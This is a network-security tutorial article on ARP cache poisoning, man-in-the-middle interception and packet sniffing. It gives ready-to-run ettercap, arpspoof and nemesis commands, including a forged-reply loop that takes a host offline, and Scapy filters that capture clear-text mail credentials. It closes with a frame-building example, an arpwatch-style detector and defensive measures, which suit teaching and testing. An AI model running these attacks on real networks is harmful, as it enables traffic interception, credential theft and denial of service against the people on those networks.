Arp Cache Poisoning and Packet Sniffing

Intruders rely on ARP cache poisoning to place themselves between hosts on a local network, where they can read or alter the traffic that passes. We'll show you some of the tools an attacker might use to poison the ARP cache and gather information on your network.

In a switched network environment, the switch forwards each frame only to the port where the destination MAC address was last seen, so a host normally receives only the frames addressed to it. The hosts, in turn, map IP addresses to MAC addresses with ARP and keep the answers in a local ARP cache. Even in this switched environment, there are ways to sniff other devices' packets. One of them is to send forged ARP replies so that a victim's cache associates another host's IP address with your MAC address. ARP keeps no state: most stacks accept a reply they never asked for and overwrite the cached entry with it (unless the entry is explicitly marked as permanent).

ARP cache poisoning puts the attacker in position to intercept communications between two computers. Computer A believes it is communicating with Computer B, but because of the poisoned ARP cache, the traffic actually goes to the attacker's computer. The attacker can then either respond to Computer A (pretending to be Computer B) or forward the packets to their intended destination, after capturing and logging them for later use. Likewise, the response from Computer B can be captured and logged by the attacker, who has also used ARP poisoning to make Computer B think the attacker's computer is Computer A. This is known as a man-in-the-middle (MITM) attack.

This article covers a number of tools used in arp cache poisoning attacks, including ettercap, arpspoof, nemesis, p0f, dsniff, and scapy.

Running Ettercap

For ARP cache poisoning to take place, the attacker needs to be in the same network segment as the systems under attack. The first step is to obtain a list of IP addresses and their associated MAC addresses. Several tools will help you obtain this information; one example is ettercap (http://ettercap.sourceforge.net/), a suite for man-in-the-middle attacks on a LAN. It features sniffing of live connections, content filtering on the fly, and active and passive dissection of many protocols. The following command, run as root:

# ettercap -T -M arp:remote //

starts ettercap in text mode (-T), scans the subnet for hosts, ARP poisons all of them (-M arp:remote with the empty target specification //; the remote parameter also lets ettercap see traffic the poisoned hosts send through a gateway), and begins sniffing. Press h for the help menu to see the single-key commands, including the one that prints the host list with each IP address and its MAC address.

Arp Cache DoS

To ARP poison a given IP address and knock the system offline so it can't communicate with anyone, use arpspoof from the dsniff suite (http://monkey.org/~dugsong/dsniff/), a free collection of tools for network auditing and penetration testing. The dsniff suite includes dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy, which passively monitor a network for interesting data (passwords, mail, files, URLs), and arpspoof, dnsspoof, and macof, which facilitate the interception of network traffic normally unavailable to an attacker because of layer-2 switching.

Arpspoof (http://arpspoof.sourceforge.net/) is much simpler than ettercap for redirecting packets:

# arpspoof -i eth0 -t <target> host

Specifying the interface is optional unless more than one interface is present. The -t option names the host whose cache to poison; if -t is omitted, every host on the LAN is poisoned. The host argument is the IP address the target should believe lives at your MAC, typically the default gateway, so that the target sends all of its off-segment traffic to you. Whether that traffic then reaches the gateway is up to you: if IP forwarding is enabled on the attacking machine (sysctl -w net.ipv4.ip_forward=1 on Linux), you are a transparent man in the middle; if it is not, the redirected packets are dropped and the target loses connectivity beyond the local segment, which is the denial of service this section is about. Arpspoof forges its ARP replies in the arp_send() function, which uses libnet to build and inject each packet: one ARP reply whose sender and target IP and Ethernet addresses are supplied by the user. Libnet is a portable API for constructing and injecting packets for a range of protocols.

To better understand the arp cache poisoning process, consider an alternative tool called Nemesis. If you have the IP and MAC of the intended target and host, you can use Nemesis to arp poison the target. Nemesis (http://nemesis.sourceforge.net/) is a command-line network packet crafting and injection utility. Nemesis can craft and inject ARP, DNS, ETHERNET, ICMP, IGMP, IP, OSPF, RIP, TCP, and UDP packets. By crafting your own packet using Nemesis, you can see how the arp cache poisoning works:

$ sudo nemesis arp -v -r -d eth0 -S 192.168.1.2 \
    -D 192.168.1.133 -h 00:22:6E:71:04:BB -m 00:0C:29:B2:78:9E \
    -H 00:22:6E:71:04:BB -M 00:0C:29:B2:78:9E

Then you create a packet to send in the other direction:

$ sudo nemesis arp -v -r -d eth0 -S 192.168.1.133 \
    -D 192.168.1.2 -h 00:22:6E:71:04:BB -m 00:22:6B:7E:AD:7C \
    -H 00:22:6E:71:04:BB -M 00:22:6B:7E:AD:7C

These two commands spoof ARP replies, first from 192.168.1.2 to 192.168.1.133 and then from 192.168.1.133 to 192.168.1.2. Among the nemesis arp options, -r makes the packet a reply rather than a request; -S and -D are the source and destination IP addresses in the ARP payload; -h and -m are the sender and target MAC addresses in the ARP payload; and -H and -M are the source and destination MAC addresses of the Ethernet frame, which nemesis lets you set independently of the ARP fields. Read the first command as "tell 192.168.1.133 (00:0C:29:B2:78:9E) that 192.168.1.2 is at 00:22:6E:71:04:BB", where 00:22:6E:71:04:BB is the attacker's own interface, and the second as the same lie told to 192.168.1.2 about 192.168.1.133. After both, each host sends the other's traffic to the attacker.

Because the real hosts keep answering ARP requests, a single forged reply does not stay in the cache for long. To keep the caches poisoned, replay the two commands every 10 seconds in a loop:

$ while true
> do
>   sudo nemesis arp -v -r -d eth0 -S 192.168.1.2 \
>     -D 192.168.1.133 -h 00:22:6E:71:04:BB -m 00:0C:29:B2:78:9E \
>     -H 00:22:6E:71:04:BB -M 00:0C:29:B2:78:9E
>   sudo nemesis arp -v -r -d eth0 -S 192.168.1.133 \
>     -D 192.168.1.2 -h 00:22:6E:71:04:BB -m 00:22:6B:7E:AD:7C \
>     -H 00:22:6E:71:04:BB -M 00:22:6B:7E:AD:7C
>   echo "Redirecting"
>   sleep 10
> done

While the loop runs, the targeted box is offline and unable to communicate with the rest of the network: its traffic for 192.168.1.2 arrives at the attacker's interface, and nothing forwards it on. I made a video on my site that demonstrates this attack; it is available at http://pbnetworks.net.
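To see exactly what the two nemesis commands put on the wire, here is an added example (not from the article and not nemesis code) that builds the same 42-byte Ethernet/ARP reply frames with Python's struct module and decodes them again the way a victim's stack would. It uses the article's addresses; nothing is transmitted, so it runs without root or a network. The function and constant names are this example's own.

```python
# Added example (not from the article or from nemesis): builds the exact
# Ethernet/ARP reply frames that the two nemesis commands above send and
# decodes them again, showing which nemesis flag lands in which field.
# Nothing here is transmitted; it only constructs and parses bytes.
#
# Frame layout (ARP for IPv4 over Ethernet II, 42 bytes):
#   Ethernet : dst MAC (6) | src MAC (6) | ethertype 0x0806 (2)
#   ARP      : htype 1 | ptype 0x0800 | hlen 6 | plen 4 | opcode |
#              sender MAC | sender IP | target MAC | target IP
import struct
from ipaddress import IPv4Address

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
ETH_FMT, ARP_FMT = "!6s6sH", "!HHBBH6s4s6s4s"

# Addresses taken from the article's nemesis commands
ATTACKER_MAC = "00:22:6e:71:04:bb"                      # -h and -H in both commands
GATEWAY_IP, GATEWAY_MAC = "192.168.1.2", "00:22:6b:7e:ad:7c"
VICTIM_IP, VICTIM_MAC = "192.168.1.133", "00:0c:29:b2:78:9e"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def build_arp_reply(src_ip, dst_ip, sender_mac, target_mac, eth_src, eth_dst):
    """Flag mapping: -S src_ip / -h sender_mac fill the ARP sender fields
    (the lie: "src_ip is at sender_mac"); -D dst_ip / -m target_mac fill the
    ARP target fields (who is being told); -H eth_src / -M eth_dst fill the
    Ethernet header, which the receiving stack does not cross-check."""
    eth = struct.pack(ETH_FMT, mac_bytes(eth_dst), mac_bytes(eth_src), ETHERTYPE_ARP)
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, ARP_REPLY,
                      mac_bytes(sender_mac), IPv4Address(src_ip).packed,
                      mac_bytes(target_mac), IPv4Address(dst_ip).packed)
    return eth + arp


def parse_arp(frame):
    """Decode a frame the way a victim's stack (or a sniffer) sees it."""
    eth_dst, eth_src, ethertype = struct.unpack(ETH_FMT, frame[:14])
    if ethertype != ETHERTYPE_ARP:
        raise ValueError("not an ARP frame: ethertype 0x%04x" % ethertype)
    htype, ptype, hlen, plen, op, smac, sip, tmac, tip = struct.unpack(ARP_FMT, frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not ARP for IPv4 over Ethernet")
    return {
        "eth_dst": mac_str(eth_dst), "eth_src": mac_str(eth_src), "op": op,
        "sender_mac": mac_str(smac), "sender_ip": str(IPv4Address(sip)),
        "target_mac": mac_str(tmac), "target_ip": str(IPv4Address(tip)),
    }


def poison_pair():
    """The article's two frames: tell the victim the gateway is at the
    attacker's MAC, then tell the gateway the victim is there too."""
    to_victim = build_arp_reply(GATEWAY_IP, VICTIM_IP, ATTACKER_MAC, VICTIM_MAC,
                                ATTACKER_MAC, VICTIM_MAC)
    to_gateway = build_arp_reply(VICTIM_IP, GATEWAY_IP, ATTACKER_MAC, GATEWAY_MAC,
                                 ATTACKER_MAC, GATEWAY_MAC)
    return to_victim, to_gateway


def cache_update(frame):
    """The (ip, mac) pair a receiver's ARP cache would store from this frame."""
    p = parse_arp(frame)
    return p["sender_ip"], p["sender_mac"]


if __name__ == "__main__":
    for frame in poison_pair():
        p = parse_arp(frame)
        print("%d bytes: %s learns %s is-at %s" %
              (len(frame), p["target_ip"], p["sender_ip"], p["sender_mac"]))
```

The point to notice is that the ARP sender fields and the Ethernet source address are separate: the victim updates its cache from the sender fields alone, which is why a stateless ARP implementation accepts the lie.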

Sniffing the LAN

One goal of arp cache poisoning is to put the attacker in position to capture and log network information. Intruders have several tools for listening on the LAN and logging data for later analysis.

Ettercap's bridge mode lets you intercept packets, which you can then read, sniff, or modify before sending them on to the victim. Bridge mode requires two interfaces, placed inline in the network segment so that traffic physically passes through your machine. Because it sends no forged ARP packets, an inline bridge is very hard to detect.

# ettercap -Tq -i eth0 -B eth1

The -i option sets eth0 as the primary interface and -B sets eth1 as the second, bridging interface; -q keeps the text interface quiet, printing only what the dissectors extract rather than raw packet contents. If you run ettercap with the GTK+ user interface, select Sniff | Bridged sniffing.

Logging Data

If you would like to log all the packets to a file, several tools will do it. One is p0f, a passive OS fingerprinting and masquerade detection utility that identifies the operating system of the hosts it sees without sending them a packet; use it for evidence gathering or for learning about servers, firewalls, and intrusion detection systems. Ettercap can also fingerprint a host (find the operating system it runs) with its finger plugin, loaded with -P; you need to specify an open port on the target. Once you know what operating system the target runs, you can anticipate how it will react:

# ettercap -Tq -P finger /192.168.1.121/22

To have p0f write the packets it sees to a tcpdump-format (pcap) file, use its -w option:

p0f -w dumpfile.pcap

Dsniff itself, from the collection described earlier, parses the protocols it knows and prints the passwords and other application data it finds. Its -w option writes the sniffed sessions to a file in dsniff's own format rather than printing them; it is not a pcap, so read it back with dsniff -r:

dsniff -w dsniff.sessions

Ettercap allows dumping packet data to file with the -w option as well.

ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.130/ -w dumpfile.pcap

It is easier and less intrusive to poison and sniff a specific host, as above, than to take on the whole LAN segment; poisoning every host on a busy segment can overload ettercap.

You can then examine the capture in Scapy (http://www.secdev.org/projects/scapy/); the pdfdump() call below renders a packet to PostScript/PDF and needs the PyX library and a viewer. Scapy is a powerful interactive packet manipulation program that can forge or decode packets of a wide number of protocols. It covers tasks such as scanning, tracerouting, probing, unit tests, and network discovery, and can stand in for tools such as tcpdump, tshark, and p0f. Start by typing scapy at the terminal prompt:

$ scapy
>>> a=rdpcap("/home/cr0wn/dumpfile.pcap")
>>> a
>>> a[423].pdfdump(layer_shift=1)

If you want to sniff traffic on a host, give Scapy the following command:

>>> sniff(filter="tcp and host 192.168.1.131", count=50)
>>> a=_
>>> a.nsummary()

This sniffs the next 50 TCP packets to or from host 192.168.1.131; a=_ keeps the result, and nsummary() prints a numbered one-line summary of each packet (see Figure 1).

If you use the sprintf() function, you can get even more control over what is displayed.

>>> pkts = sniff(prn=lambda x: x.sprintf("{IP:%IP.src% -> %IP.dst%\n}{Raw:%Raw.load%\n}"))

You can narrow down the ports you sniff, for example to 25 and 110, the SMTP and POP3 ports mail clients use, which carry credentials in clear text unless TLS is in use. Enter the following command in Scapy:

>>> a=sniff(filter="tcp and ( port 25 or port 110 )",
...         prn=lambda x: x.sprintf("%IP.src%:%TCP.sport% -> "
...                                 "%IP.dst%:%TCP.dport%  %2s,TCP.flags% : %TCP.payload%"))

The preceding command sniffs TCP traffic on ports 25 and 110 and hands each packet to a lambda (an anonymous function) as the prn callback; inside it, sprintf() formats just the fields you care about, here the endpoints, the TCP flags, and the payload.

Scapy can also graph what you are sniffing by producing a simple diagram of packet flow. The conversations() method builds a conversation graph; it requires graphviz and ImageMagick. The following command sniffs the wireless interface (wlan0), which is connected to a foreign network, prints a summary of each packet as it arrives, and then renders the conversations as a graphic.

>>> a=sniff(iface="wlan0", prn=lambda x: x.summary())
>>> a.conversations()

Figure: Sniffing packets with Scapy.

Conclusion

ARP cache poisoning lets any computer on the local area network take up one of the most powerful attack postures in network security, the man in the middle (MITM). A MITM can monitor, filter, and modify any traffic moving between hosts on the LAN, or between the LAN and its gateway. This article identified some open source tools that you can use to test your network's susceptibility to an ARP cache MITM attack. By familiarizing yourself with these tools, you can see how secure your network really is.

Good defenses against these techniques are port security and, where your switches support it, Dynamic ARP Inspection (which drops ARP packets whose IP-to-MAC binding does not match what DHCP snooping has recorded); static, permanent ARP entries for critical hosts such as the default gateway (arp -s <ip> <mac>), which a forged reply cannot overwrite; and running arpwatch (http://linuxcommand.org/man_pages/arpwatch8.html) to monitor ARP traffic on your network and report when an IP address changes its MAC address.
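The monitoring side is easy to reason about once you see what the attack looks like in ARP terms. The following added example (not arpwatch's code, and not from the article) is a small arpwatch-style detector: it is fed the sender IP and MAC from each ARP reply seen on the segment and reports, in arpwatch's vocabulary, when an IP address changes its MAC ("changed ethernet address"), when it keeps alternating between two MACs ("flip flop", the pattern you get when the real host and the attacker both answer), and one check arpwatch does not do, a single MAC claiming several IP addresses. The sample observations are constructed to replay the nemesis scenario above with the article's addresses; the function names are this example's own.

```python
# Added example (not arpwatch's code): an arpwatch-style monitor that learns
# the IP-to-MAC pairings a segment advertises and reports what the attack
# above produces. Input: (time, sender IP, sender MAC) taken from the sender
# fields of each ARP reply. The SAMPLE below is constructed, not captured.
from collections import defaultdict


def detect_arp_anomalies(observations):
    """Return a list of alert dicts, in the order the anomalies are seen.
    'changed ethernet address': an IP moved to a new MAC.
    'flip flop': it moved back to the MAC it had just before.
    'mac claims several ips': one MAC speaks for more than one IP; this is
    legitimate for routers and VM hosts, so tune or whitelist it per site."""
    current = {}                   # ip -> MAC last advertised for it
    previous = {}                  # ip -> the MAC before that
    ips_per_mac = defaultdict(set)
    alerts = []
    for ts, ip, mac in observations:
        mac = mac.lower()
        old = current.get(ip)
        if old is not None and old != mac:
            kind = "flip flop" if previous.get(ip) == mac else "changed ethernet address"
            alerts.append({"ts": ts, "type": kind, "ip": ip, "old": old, "new": mac})
            previous[ip] = old
        current[ip] = mac          # first sighting (arpwatch's "new station") is just learned
        if ip not in ips_per_mac[mac]:
            ips_per_mac[mac].add(ip)
            if len(ips_per_mac[mac]) > 1:
                alerts.append({"ts": ts, "type": "mac claims several ips",
                               "mac": mac, "ips": sorted(ips_per_mac[mac])})
    return alerts


# Constructed sample: gateway and victim answer normally, the attacker's two
# nemesis replies arrive, the real gateway answers a request, the loop replays.
SAMPLE = [
    (0,  "192.168.1.2",   "00:22:6b:7e:ad:7c"),   # real gateway
    (1,  "192.168.1.133", "00:0c:29:b2:78:9e"),   # real victim
    (10, "192.168.1.2",   "00:22:6e:71:04:bb"),   # attacker, aimed at the victim's cache
    (10, "192.168.1.133", "00:22:6e:71:04:bb"),   # attacker, aimed at the gateway's cache
    (12, "192.168.1.2",   "00:22:6b:7e:ad:7c"),   # real gateway answers an ARP request
    (20, "192.168.1.2",   "00:22:6e:71:04:bb"),   # attacker's 10-second loop replays
]


def summarize(alerts):
    """Count alerts by type, the figure you would put on a dashboard."""
    counts = defaultdict(int)
    for a in alerts:
        counts[a["type"]] += 1
    return dict(counts)


if __name__ == "__main__":
    for alert in detect_arp_anomalies(SAMPLE):
        print(alert)
    print(summarize(detect_arp_anomalies(SAMPLE)))
```

On the sample this yields two "changed ethernet address" alerts at t=10 (one per poisoned host), one "mac claims several ips" alert for the attacker's MAC, and two "flip flop" alerts as the real gateway and the attacker's loop take turns; the flip flop is the signature to page on, because a legitimate NIC replacement changes an address once and stays there.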

One way to protect network clients that browse the web is HTTPS Everywhere (https://www.eff.org/https-everywhere) from the Electronic Frontier Foundation (EFF). HTTPS Everywhere makes the browser connect to supporting websites over HTTPS instead of ordinary HTTP, which passes information in clear text that an attacker sniffing the local segment can read. Encryption does not stop the poisoning itself, but it denies the attacker the content.

The Author

David J. Dodd holds a current Top Secret DoD Clearance and is available for consulting on various Information Assurance projects. A former US Marine with an Avionics background in Electronic Countermeasures Systems, David has given talks at the San Diego Regional Security Conference and SDISSA. He is a member of InfraGard and contributes to Securing Our eCity (http://securingourecity.org). He works for pbnetworks Inc. (http://pbnetworks.net), a service-disabled-veteran–owned business located in San Diego, CA. You can contact him by emailing dave@pbnetworks.net.